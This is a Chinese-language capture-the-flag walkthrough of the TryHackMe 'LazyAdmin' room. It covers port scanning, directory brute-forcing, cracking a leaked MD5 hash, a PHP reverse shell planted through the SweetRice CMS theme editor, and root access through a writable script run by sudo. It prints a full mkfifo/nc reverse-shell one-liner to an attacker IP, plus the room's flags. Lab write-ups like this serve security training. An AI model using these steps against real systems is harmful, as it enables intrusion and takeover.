服务发现

┌──(rootkali)-[~/tryhackme/LazyAdminFinal]└─# nmap -sV -Pn 10.10.113.182 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-23 22:02 EDTNmap scan report for 10.10.113.182Host is up (0.37s latency).Not shown: 998 closed portsPORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds

目录爆破

┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u http://10.10.113.182 -e* -t 100                                                                                                                                                                           130 ⨯ _|. _ _  _  _  _ _|_    v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100Error Log: /root/dirsearch/logs/errors-21-09-23_22-07-17.logTarget: http://10.10.113.182[22:07:18] Starting: [22:07:39] 301 -  316B  - /content  ->  http://10.10.113.182/content/                                             [22:07:42] 200 -   11KB - /index.html                                                                          

只有一个content目录,关上是一个SweetRicecms介绍页,持续爆破content目录

┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u http://10.10.113.182/content -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-lowercase-2.3-medium.txt _|. _ _  _  _  _ _|_    v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 207627Error Log: /root/dirsearch/logs/errors-21-09-23_22-58-30.logTarget: http://10.10.113.182/content[22:58:30] Starting: [22:58:31] 200 -    2KB - /content/[22:58:34] 301 -  323B  - /content/images  ->  http://10.10.113.182/content/images/[22:58:40] 301 -  319B  - /content/js  ->  http://10.10.113.182/content/js/[22:58:44] 301 -  320B  - /content/inc  ->  http://10.10.113.182/content/inc/[22:58:47] 301 -  319B  - /content/as  ->  http://10.10.113.182/content/as/[22:58:48] 301 -  324B  - /content/_themes  ->  http://10.10.113.182/content/_themes/[22:58:49] 301 -  327B  - /content/attachment  ->  http://10.10.113.182/content/attachment/

http://10.10.113.182/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql找到备份的mysql语句,裸露了cms表名,一个登录凭证

用户名:manager明码:42f749ade7f9e195bf475f37a44cafcb

md5明码破解进去是:Password123

http://10.10.113.182/content/as/是登陆页面

/content/license.txt/inc/lastest.txt验证cms的版本号是1.5.1,在kali搜寻这个版本号的cms破绽

┌──(rootkali)-[~]└─# searchsploit SweetRice 1.5.1---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                                                                                                                                            |  Path---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------SweetRice 1.5.1 - Arbitrary File Download                                                                                                                                                                 | php/webapps/40698.pySweetRice 1.5.1 - Arbitrary File Upload                                                                                                                                                                   | php/webapps/40716.pySweetRice 1.5.1 - Backup Disclosure                                                                                                                                                                       | php/webapps/40718.txtSweetRice 1.5.1 - Cross-Site Request Forgery                                                                                                                                                              | php/webapps/40692.htmlSweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                                                                                                                                         | php/webapps/40700.html---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results

上传脚本须要一个登录凭证,应用下面找到的manager:Password123,应用40716.py攻打脚本,然而貌似上传不了文件

登录后盾,在Theme,抉择Footer section template,间接编辑php源码写反弹shell,拜访http://10.10.113.182/content/_themes/default/foot.php胜利反弹到shell,拿到user.txt

┌──(rootkali)-[~/tryhackme/LazyAdminFinal]└─# nc -lnvp 1234                                      listening on [any] 1234 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.113.182] 46142Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux 06:50:08 up  1:48,  0 users,  load average: 0.00, 0.00, 0.00USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$ cd /home$ lsitguy$ cd itguy$ lsDesktopDocumentsDownloadsMusicPicturesPublicTemplatesVideosbackup.plexamples.desktopmysql_login.txtuser.txt$ cat user.txtTHM{63e5bce9271952aad1113b6f1ac28a07}

在同目录有一个backup.pl文件,源码内容是执行一个copy.sh文件
而copy.sh是能够编辑的
两个文件所有者是root,如果能够以root的身份执行一个/etc/copy.sh批处理文件,咱们就能够应用该sh文件来晋升到root

$ cat backup.pl#!/usr/bin/perlsystem("sh", "/etc/copy.sh");$ cat /etc/copy.shrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f$ ls -alh /etc/copy.sh-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh

写shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f" > /etc/copy.sh

切换tty,查看sudo -l,www-data正好能够用root权限执行/home/itguy/backup.pl

$ python -c 'import pty; pty.spawn("/bin/sh")'$ sudo -lsudo -lMatching Defaults entries for www-data on THM-Chal:    env_reset, mail_badpass,    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser www-data may run the following commands on THM-Chal:    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl$ sudo /usr/bin/perl /home/itguy/backup.plsudo /usr/bin/perl /home/itguy/backup.pl

与此同时另起一个端口监听,拿到root反弹shell和root.txt

┌──(rootkali)-[~]└─# nc -lnvp 4242                                                                                                                                                                                                                       1 ⨯listening on [any] 4242 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.113.182] 33518# iduid=0(root) gid=0(root) groups=0(root)# cat /root/root.txtTHM{6637f41d0177b6f37cb20d775124699f}